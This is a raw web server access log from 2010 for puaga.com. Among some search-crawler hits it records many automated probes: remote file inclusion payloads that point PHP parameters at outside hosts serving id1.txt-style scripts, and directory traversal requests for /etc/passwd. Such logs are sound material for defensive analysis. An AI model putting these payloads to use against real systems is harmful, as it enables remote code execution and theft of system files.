123.143.29.250 - - [21/Feb/2010:08:16:39 -0800] "GET /logs/access_100125.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:16:39 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:16:39 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:16:50 -0800] "GET /logs/access_100119.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:17:32 -0800] "GET /delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:17:32 -0800] "GET /logs//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:17:32 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:17:46 -0800] "GET /logs/access_100123.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:17:59 -0800] "GET /logs/access_100120.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:19:09 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:19:09 -0800] "GET /logs//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:19:09 -0800] "GET /delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.241 - - [21/Feb/2010:08:19:34 -0800] "GET //vwar/backup/errors.php?error=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:19:39 -0800] "GET /logs/access_100123.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:19:58 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:19:58 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:19:58 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:20:05 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:20:05 -0800] "GET /delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:20:05 -0800] "GET /logs//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:20:13 -0800] "GET /logs/access_100121.log/index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:20:14 -0800] "GET /index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 3626 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:20:14 -0800] "GET /logs/index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:08:20:24 -0800] "GET /logs/access_100129.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:08:20:24 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:08:20:24 -0800] "GET /logs/access_100211.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [21/Feb/2010:08:20:24 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:20:36 -0800] "GET /logs/access_100123.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:20:47 -0800] "GET /skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:20:47 -0800] "GET /logs/access_100119.log/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:20:48 -0800] "GET /logs/skin/zero_vote/error.php?dir=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:08:21:29 -0800] "GET /diger HTTP/1.0" 301 74 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:08:21:30 -0800] "GET /diger/ HTTP/1.0" 200 3529 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:08:21:30 -0800] "GET /style/5.style.css HTTP/1.0" 200 2407 "http://www.puaga.com/diger/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:21:36 -0800] "GET /delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:21:36 -0800] "GET /logs/access_100125.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:21:36 -0800] "GET /logs//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:21:40 -0800] "GET /logs/access_100117.log//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:21:41 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:21:41 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:22:03 -0800] "GET /logs//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:22:03 -0800] "GET /delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:22:03 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:22:28 -0800] "GET /logs/access_100123.log//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [21/Feb/2010:08:22:53 -0800] "GET /logs/access_100123.log%20%20//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:22:53 -0800] "GET /delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:22:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:22:53 -0800] "GET /logs/access_100125.log%20%20//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [21/Feb/2010:08:24:02 -0800] "GET /logs/access_100123.log%20%20//delete_all.php?board_skin_path=http://phppod.com//administrator/components/aadc/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:24:52 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:24:52 -0800] "GET /components/com_forum/download.php?phpbb_root_path=? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:24:52 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
116.127.121.117 - - [21/Feb/2010:08:24:53 -0800] "GET /bbs/write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:24:53 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
218.232.105.116 - - [21/Feb/2010:08:25:01 -0800] "GET /bbs/write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:26:46 -0800] "GET /logs//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:26:46 -0800] "GET /bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:26:46 -0800] "GET /logs/access_100122.log%20%20//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:26:52 -0800] "GET /logs/access_100114.log%20%20//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:08:27:27 -0800] "GET /bbs/ashnews.php?pathtoashnews=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:08:27:27 -0800] "GET /logs/access_100128.log%20%20//bbs/ashnews.php?pathtoashnews=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:08:27:27 -0800] "GET /logs//bbs/ashnews.php?pathtoashnews=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:27:55 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:27:55 -0800] "GET /components/com_forum/download.php?phpbb_root_path=? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:27:55 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:27:55 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:08:28:02 -0800] "GET /logs/access_100114.log%20%20//bbs/ashnews.php?pathtoashnews=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:28:42 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:28:42 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:28:42 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:28:52 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:28:52 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [21/Feb/2010:08:28:52 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:29:53 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:29:53 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:29:53 -0800] "GET /logs/access_100206.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:30:22 -0800] "GET /bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:30:22 -0800] "GET /logs//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:30:22 -0800] "GET /logs/access_100128.log//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:30:35 -0800] "GET /logs/access_100122.log//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:31:11 -0800] "GET /components/com_forum/download.php?phpbb_root_path=? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:31:11 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=? HTTP/1.1" 404 5258 "-" "Avant Browser (http://www.avantbrowser.com)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:31:11 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
82.76.12.197 - - [21/Feb/2010:08:31:11 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:31:23 -0800] "GET /bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:31:23 -0800] "GET /logs//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:31:23 -0800] "GET /logs/access_100114.log//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [21/Feb/2010:08:31:26 -0800] "GET /logs/access_100122.log//bbs/ashnews.php?pathtoashnews=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:32:14 -0800] "GET /logs/access_100206.log%20%20/admin/spaw/spaw_control.class.php?spaw_root=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.230.14 - - [21/Feb/2010:08:32:43 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "puaga.com"
65.55.230.14 - - [21/Feb/2010:08:32:43 -0800] "GET /images/puaga.com_main.09482309483291.png HTTP/1.1" 200 154201 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "puaga.com"
116.127.121.117 - - [21/Feb/2010:08:32:55 -0800] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
116.127.121.117 - - [21/Feb/2010:08:32:56 -0800] "GET /bbs/write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
116.127.121.117 - - [21/Feb/2010:08:32:57 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://tdos.org/images/log.png??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.175.35.138 - - [21/Feb/2010:08:33:40 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.35.138 - - [21/Feb/2010:08:33:40 -0800] "GET /logs/access_100206.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.35.138 - - [21/Feb/2010:08:33:40 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.35.138 - - [21/Feb/2010:08:33:49 -0800] "GET /logs/access_100130.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:08:36:19 -0800] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:08:36:19 -0800] "GET /logs/access_100129.log%20%20///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.230.221.15 - - [21/Feb/2010:08:36:19 -0800] "GET /logs///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:36:26 -0800] "GET //components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:36:26 -0800] "GET /logs///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:08:36:26 -0800] "GET /logs/access_100129.log%20%20///components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:36:41 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:36:41 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:36:42 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:36:43 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:36:43 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:36:43 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:36:48 -0800] "GET /logs/access_100123.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:36:48 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.3.132.185 - - [21/Feb/2010:08:36:49 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
